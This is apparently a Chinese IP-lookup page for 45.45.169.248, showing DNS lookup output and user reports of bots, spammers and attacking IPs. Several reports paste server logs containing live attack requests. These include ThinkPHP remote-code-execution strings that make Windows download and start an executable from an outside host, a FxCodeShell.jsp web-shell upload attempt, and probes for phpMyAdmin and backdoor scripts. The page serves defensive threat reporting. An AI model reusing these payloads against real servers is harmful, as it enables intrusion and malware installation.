必须是合法有效的IP地址, 可以是IPv4或者是IPv6, 例如127.0.0.1或者2001:DB8:0:0:8:800:200C:417A
基本信息:

城市(city): unknown

省份(region): unknown

国家(country): France

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:
暂无关于此IP的讨论, 沙发请点上方按钮
相同子网IP讨论:
暂无关于此IP所属子网相关IP的讨论.
WHOIS信息:
b
DIG信息:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 45.45.169.248
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 13808
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;45.45.169.248.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025012500 1800 900 604800 86400

;; Query time: 10 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sun Jan 26 00:23:22 CST 2025
;; MSG SIZE  rcvd: 106
HOST信息:
248.169.45.45.in-addr.arpa domain name pointer 45-45-169-248.ipv4.sdf.as32030.net.
NSLOOKUP信息:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
248.169.45.45.in-addr.arpa	name = 45-45-169-248.ipv4.sdf.as32030.net.

Authoritative answers can be found from:
相关IP信息:
最新评论:
IP 类型 评论内容 时间
207.46.13.229 bots
微软bingbot
2019-03-29 09:12:04
76.237.130.233 attack
76.237.130.233 - - [01/Apr/2019:19:03:08 +0800] "GET /phpmyadmin2/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
 Chrome/72.0.3626.119 Safari/537.36"
76.237.130.233 - - [01/Apr/2019:19:03:09 +0800] "GET /phpmyadmin3/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
 Chrome/72.0.3626.119 Safari/537.36"
76.237.130.233 - - [01/Apr/2019:19:03:10 +0800] "GET /phpmyadmin4/index.php?lang=en HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
 Chrome/72.0.3626.119 Safari/537.36"
2019-04-01 19:53:21
118.25.49.95 attack
118.25.49.95 - - [01/Apr/2019:11:49:22 +0800] "GET /struts2-rest-showcase/orders.xhtml HTTP/1.1" 400 682 "http://118.25.52.138:443/struts2-rest-showcase/orders.xhtml" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [01/Apr/2019:11:49:22 +0800] "GET /index.action HTTP/1.1" 400 682 "http://118.25.52.138:443/index.action" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [01/Apr/2019:11:49:22 +0800] "GET /index.do HTTP/1.1" 400 682 "http://118.25.52.138:443/index.do" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
2019-04-01 11:50:45
183.57.53.177 attack
183.57.53.177 - - [01/Apr/2019:08:57:38 +0800] "GET /linkx.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
183.57.53.177 - - [01/Apr/2019:08:57:38 +0800] "GET /linkx.php HTTP/1.1" 404 209 "http://118.25.52.138/linkx.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
2019-04-01 08:58:20
203.208.60.13 bots
谷歌中国爬虫
2019-03-30 08:42:08
118.25.71.65 attack
攻击型IP
118.25.71.65 - - [31/Mar/2019:17:57:14 +0800] "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.71.65 - - [31/Mar/2019:17:57:14 +0800] "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.71.65 - - [31/Mar/2019:17:57:14 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
2019-03-31 17:58:18
203.208.60.13 bots
提交sitemap后Google使用的useragent
2019-03-30 08:40:05
66.102.6.142 bots
谷歌icon爬虫
66.102.6.142 - - [29/Mar/2019:09:01:33 +0800] "GET / HTTP/1.1" 200 29010 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon"
2019-03-29 09:18:49
40.77.167.75 bots
微软bingbot爬虫
2019-03-29 09:12:15
118.25.49.95 attack
118.25.49.95 - - [01/Apr/2019:09:39:12 +0800] "PUT /FxCodeShell.jsp%20 HTTP/1.1" 301 194 "http://118.25.52.138:80/FxCodeShell.jsp%20" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [01/Apr/2019:09:39:12 +0800] "PUT /FxCodeShell.jsp%20 HTTP/1.1" 404 232 "http://118.25.52.138:80/FxCodeShell.jsp%20" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [01/Apr/2019:09:39:12 +0800] "PUT /FxCodeShell.jsp::$DATA HTTP/1.1" 301 194 "http://118.25.52.138:80/FxCodeShell.jsp::$DATA" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [01/Apr/2019:09:39:12 +0800] "PUT /FxCodeShell.jsp::$DATA HTTP/1.1" 404 232 "http://118.25.52.138:80/FxCodeShell.jsp::$DATA" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [01/Apr/2019:09:39:12 +0800] "PUT /FxCodeShell.jsp/ HTTP/1.1" 301 194 "http://118.25.52.138:80/FxCodeShell.jsp/" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [01/Apr/2019:09:39:12 +0800] "PUT /FxCodeShell.jsp/ HTTP/1.1" 404 232 "http://118.25.52.138:80/FxCodeShell.jsp/" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [01/Apr/2019:09:39:12 +0800] "GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe HTTP/1.1" 301 194 "http://118.25.52.138:80/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [01/Apr/2019:09:39:12 +0800] "GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe HTTP/1.1" 404 232 "http://118.25.52.138:80/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
2019-04-01 09:39:56
5.188.210.57 spam
wordpress垃圾评论,每天好多
5.188.210.57 - - [28/Mar/2019:17:37:49 +0800] "GET /index.php/page/869/ HTTP/1.0" 200 77511 "https://www.eznewstoday.com/index.php/page/869/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.3
6"
5.188.210.57 - - [28/Mar/2019:17:37:50 +0800] "GET /index.php/2019/02/01/stripe_2019_02_01_en/ HTTP/1.0" 200 41681 "https://www.eznewstoday.com/index.php/2019/02/01/stripe_2019_02_01_en/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML
, like Gecko) Chrome/67.0.3396.62 Safari/537.36"
5.188.210.57 - - [28/Mar/2019:17:37:50 +0800] "POST /wp-comments-post.php HTTP/1.0" 302 4146 "https://www.eznewstoday.com/index.php/2019/02/01/stripe_2019_02_01_en/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/6
7.0.3396.62 Safari/537.36"
2019-03-28 17:39:26
37.115.184.170 spam
37.115.184.170 - - [02/Apr/2019:09:49:36 +0800] "GET / HTTP/1.1" 301 228 "https://belarusy.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
37.115.184.170 - - [02/Apr/2019:09:49:36 +0800] "GET / HTTP/1.1" 301 228 "https://belarusy.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
37.115.184.170 - - [02/Apr/2019:09:49:37 +0800] "GET / HTTP/1.1" 301 228 "https://belarusy.net/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.3 (build 01218); .NET CLR 1.1.4322)"
2019-04-02 09:53:50
58.251.121.184 attack
58.251.121.184 - - [01/Apr/2019:07:47:17 +0800] "GET /ljb.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
58.251.121.185 - - [01/Apr/2019:07:47:17 +0800] "GET /db_cts.php HTTP/1.1" 404 209 "http://118.25.52.138/db_cts.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
58.251.121.184 - - [01/Apr/2019:07:47:17 +0800] "GET /ljb.php HTTP/1.1" 404 209 "http://118.25.52.138/ljb.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
2019-04-01 08:05:15
144.217.70.190 attack
144.217.70.190 - - [02/Apr/2019:09:51:04 +0800] "POST /xmlrpc.php HTTP/1.0" 404 468 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)" 
144.217.70.190 - - [02/Apr/2019:09:51:05 +0800] "POST /xmlrpc.php HTTP/1.0" 404 468 "-" "Mozilla/4.0 (compatible: MSIE 7.0; Windows NT 6.0)"
2019-04-02 10:21:51
118.25.49.95 attack
118.25.49.95 - - [02/Apr/2019:20:00:02 +0800] "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start%20C:/Windows/temp/lodhbrsdjsbwixa27329.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start C:/Windows/temp/lodhbrsdjsbwixa27329.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [02/Apr/2019:20:00:02 +0800] "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [02/Apr/2019:20:00:02 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start%20C:/Windows/temp/lodhbrsdjsbwixa27329.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start C:/Windows/temp/lodhbrsdjsbwixa27329.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
2019-04-02 20:03:22

最近上报的IP列表

8.74.91.19 185.193.187.183 145.41.241.227 172.243.204.43
232.203.64.126 137.124.19.251 63.25.106.65 242.56.249.52
82.167.79.124 152.219.26.37 121.91.18.241 134.199.188.135
96.73.159.10 146.128.36.21 126.79.246.229 145.188.13.122
228.219.160.25 175.68.159.124 82.177.226.80 74.178.2.80